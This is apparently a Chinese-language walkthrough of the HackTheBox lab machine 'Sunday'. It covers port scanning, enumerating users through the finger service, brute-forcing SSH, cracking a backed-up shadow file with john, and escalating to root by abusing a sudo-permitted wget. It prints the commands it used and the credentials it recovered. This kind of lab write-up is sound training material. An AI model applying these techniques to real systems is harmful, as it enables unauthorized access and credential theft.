基本信息

https://www.hackthebox.eu/home/machines/profile/136
10.10.10.76

端口扫描

$ nmap -sT -Pn -p- --min-rate 5000 10.10.10.76
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 14:44 CST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.76
Host is up (0.075s latency).
Not shown: 65431 closed ports, 99 filtered ports
PORT      STATE SERVICE
79/tcp    open  finger
111/tcp   open  rpcbind
22022/tcp open  unknown
38408/tcp open  unknown
52740/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1898.30 seconds

finger

79是finger server，直接用脚本枚举用户：

https://github.com/pentestmonkey/finger-user-enum

得到两个有效用户名：

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

sammy@10.10.10.76: sammy                 pts/2        <Sep 27 13:55> 10.10.16.26         ..
sunny@10.10.10.76: sunny                 pts/3        <Apr 24 10:48> 10.10.14.4          ..

ssh brute force

ssh端口是22022，简单的爆破得到有效的账号密码：

1	sunny ： sunday

Sunny

然后直接ssh登录sunny用户，ssh有个报错需要指定算法：

1	ssh -okexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p 22022

backup

backup目录下有shadow.backup:

shadow crack

直接破解出sammy用户密码：

1
2
3

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

cooldude!        (sammy)

user flag

然后ssh登录sammy用户，得到user.txt:

提权信息

Sudo -l显示可以无密码以root身份运行wget：

利用方式：

https://gtfobins.github.io/gtfobins/wget/#sudo

root flag

wget利用方式非常多，参考资料里0xdf给了6种，最简单的直接使用file协议报错信息得到root flag：

参考资料

https://github.com/pentestmonkey/finger-user-enum
https://gtfobins.github.io/gtfobins/wget/#sudo
https://www.hackthebox.eu/home/machines/writeup/136
HTB: Sunday | 0xdf hacks stuff
https://0xdf.gitlab.io/2018/09/29/htb-sunday.html
HackTheBox - Sunday - YouTube
https://www.youtube.com/watch?v=xUrq29OTSuM&feature=youtu.be&ab_channel=IppSec

Sunday - HackTheBox

2020-02-16